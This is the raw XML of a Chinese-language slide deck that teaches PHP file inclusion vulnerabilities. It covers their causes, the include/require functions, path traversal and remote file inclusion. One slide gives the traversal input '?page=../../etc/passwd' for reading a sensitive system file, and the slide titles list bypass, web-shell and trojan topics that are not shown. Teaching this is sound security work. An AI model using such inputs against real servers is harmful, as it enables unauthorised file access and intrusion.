            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId15"/>
              </p:custDataLst>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8"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId16"/>
              </p:custDataLst>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9"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId17"/>
              </p:custDataLst>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18"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7348461" y="4493274"/>
            <a:ext cx="652329" cy="652329"/>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标题 5"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件包含漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>成因</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="962660" y="1312545"/>
            <a:ext cx="10294620" cy="2245360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr sz="2000" b="1"/>
              <a:t>文件包含漏洞的成因主要是由于Web应用程序在实现文件包含功能时，对用户输入的文件路径缺乏充分的验证和过滤，导致攻击者可以控制文件的加载过程。以下是文件包含漏洞常见的成因：</a:t>
            </a:r>
            <a:endParaRPr sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000" b="1"/>
              <a:t>    缺乏输入验证和过滤：</a:t>
            </a:r>
            <a:endParaRPr sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000" b="1"/>
              <a:t>        当Web应用程序允许用户输入文件路径或名称，并使用该输入来动态加载文件时，如果没有对输入进行严格的验证和过滤，攻击者可能会通过修改输入加载任意文件。</a:t>
            </a:r>
            <a:endParaRPr sz="2000" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3031490" y="4524375"/>
            <a:ext cx="5951220" cy="1752600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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文件包含漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>成因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35635" y="1286510"/>
            <a:ext cx="10736580" cy="1322070"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 使用不安全的文件包含函数：</a:t>
            </a:r>
            <a:endParaRPr sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        在编程语言中，像PHP的include()、require()、include_once()和require_once()等函数可以加载指定路径的文件。开发人员如果直接使用这些函数加载用户输入的路径而不加以限制，就可能引入文件包含漏洞。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="471805" y="2759710"/>
            <a:ext cx="11221720" cy="2306955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>include()：尝试加载并执行指定文件。如果文件不存在或加载失败，程序会继续执行，并发出警告（warning）。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>require()：与include()类似，但如果文件不存在或加载失败，会抛出致命错误（fatal error），程序终止执行。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>include_once()：与include()功能相同，但如果之前已经加载过相同的文件，则不会再次加载。这有助于避免重复加载相同的文件。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>require_once()：与require()功能相同，但如果之前已经加载过相同的文件，则不会再次加载。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="471805" y="5310505"/>
            <a:ext cx="5539740" cy="1203960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6162675" y="5483225"/>
            <a:ext cx="4135755" cy="1134110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>用户可以通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>?page=../../etc/passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>尝试加载系统上的敏感文件。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>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文件包含漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>成因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52755" y="2652395"/>
            <a:ext cx="11140440" cy="1630045"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 目录遍历（Path Traversal）：</a:t>
            </a:r>
            <a:endParaRPr sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        目录遍历是指攻击者通过在输入中添加../等目录跳转字符来访问服务器的上级目录。例如，输入../../etc/passwd可能会导致加载敏感的系统文件。</a:t>
            </a:r>
            <a:endParaRPr sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        如果应用程序没有正确处理这些特殊字符，攻击者就可以利用它们访问本地文件系统中的任意文件。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRP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文件包含漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>成因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88975" y="2299335"/>
            <a:ext cx="11017250" cy="1938020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    不安全的服务器配置：</a:t>
            </a:r>
            <a:endParaRPr sz="2000" b="1">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        在PHP等编程语言中，如果服务器配置允许从远程服务器加载文件（例如PHP的allow_url_include设置为On），就可能被利用来执行远程文件包含（RFI）攻击。</a:t>
            </a:r>
            <a:endParaRPr sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        远程文件包含漏洞可以让攻击者从外部服务器加载恶意代码并在目标服务器上执行，导致远程代码执行等高风险问题。</a:t>
            </a:r>
            <a:endParaRPr sz="2000" b="1">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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1.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2.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3.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4.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5.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6.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7.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ISPRING_PRESENTATION_TITLE" val="简介"/>
  <p:tag name="COMMONDATA" val="eyJoZGlkIjoiYWU0MjBhMWIzZTBhYzUzOTAwZDM4YjFjYzMyZDhiZDgifQ=="/>
  <p:tag name="KSO_WPP_MARK_KEY" val="cd0e3a4c-2610-40e3-b2fe-067e3589c6da"/>
  <p:tag name="commondata" val="eyJoZGlkIjoiMzlhMTgzNjQyMWY2ZDhkY2RlYjMxNzNjYzE2NWZkMTkifQ=="/>
  <p:tag name="resource_record_key" val="{&quot;70&quot;:[3312357]}"/>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200">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="0162A7"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="BC2823"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="BC2823"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="0162A7"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="BC2823"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="0162A7"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="BC2823"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="0162A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8786</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>628</Paragraphs>
  <Slides>57</Slides>
  <Notes>45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57</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="73" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>思源黑体 CN Bold</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>经典综艺体简</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Office 主题</vt:lpstr>
      <vt:lpstr>WPS</vt:lpstr>
      <vt:lpstr>文件包含漏洞</vt:lpstr>
      <vt:lpstr>Content</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>文件包含漏洞</vt:lpstr>
      <vt:lpstr>文件包含漏洞</vt:lpstr>
      <vt:lpstr>文件包含漏洞-成因</vt:lpstr>
      <vt:lpstr>文件包含漏洞-成因</vt:lpstr>
      <vt:lpstr>文件包含漏洞-成因</vt:lpstr>
      <vt:lpstr>文件包含漏洞-成因</vt:lpstr>
      <vt:lpstr>文件包含漏洞-成因</vt:lpstr>
      <vt:lpstr>总结</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>示例（维基百科）</vt:lpstr>
      <vt:lpstr>示例</vt:lpstr>
      <vt:lpstr>示例说明</vt:lpstr>
      <vt:lpstr>示例2-DVWA</vt:lpstr>
      <vt:lpstr>伪协议简介</vt:lpstr>
      <vt:lpstr>伪协议简介</vt:lpstr>
      <vt:lpstr>伪协议简介</vt:lpstr>
      <vt:lpstr>input</vt:lpstr>
      <vt:lpstr>其他利用方式</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>LFI</vt:lpstr>
      <vt:lpstr>LFI-1</vt:lpstr>
      <vt:lpstr>GET请求、POST请求</vt:lpstr>
      <vt:lpstr>LFI-1</vt:lpstr>
      <vt:lpstr>LFI-1</vt:lpstr>
      <vt:lpstr>LFI-1-include</vt:lpstr>
      <vt:lpstr>其他利用方式-00截断</vt:lpstr>
      <vt:lpstr>LFI-2-00截断</vt:lpstr>
      <vt:lpstr>结尾加点LFI-3</vt:lpstr>
      <vt:lpstr>点和斜线LFI-3</vt:lpstr>
      <vt:lpstr>LFI-3-大小写绕过</vt:lpstr>
      <vt:lpstr>LFI-3-空格绕过</vt:lpstr>
      <vt:lpstr>LFI-4</vt:lpstr>
      <vt:lpstr>LFI-5</vt:lpstr>
      <vt:lpstr>双写绕过-LFI-5</vt:lpstr>
      <vt:lpstr>LFI-6</vt:lpstr>
      <vt:lpstr>LFI-6-POST</vt:lpstr>
      <vt:lpstr>LFI-6-POST</vt:lpstr>
      <vt:lpstr>get shell</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>执行木马</vt:lpstr>
      <vt:lpstr>LFI-7</vt:lpstr>
      <vt:lpstr>LFI-8</vt:lpstr>
      <vt:lpstr>filiter伪协议</vt:lpstr>
      <vt:lpstr>伪协议用法</vt:lpstr>
      <vt:lpstr>伪协议用法</vt:lpstr>
      <vt:lpstr>伪协议用法</vt:lpstr>
      <vt:lpstr>Filter</vt:lpstr>
      <vt:lpstr>Filter-LFI-1</vt:lpstr>
      <vt:lpstr>Filter-LFI-1</vt:lpstr>
      <vt:lpstr>input-EX1</vt:lpstr>
      <vt:lpstr>input-EX-1</vt:lpstr>
      <vt:lpstr>input-写入木马</vt:lpstr>
      <vt:lpstr>ZIP伪协议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bai</dc:creator>
  <dc:description>锐旗设计；https://9ppt.taobao.com</dc:description>
  <cp:lastModifiedBy>企业用户_1175206092</cp:lastModifiedBy>
  <cp:revision>684</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-05-05T08:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-30T06:46:53Z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2BC3741E2C6843F1A5652693AB74EE41_13</vt:lpwstr>
  </property>
</Properties>
</file>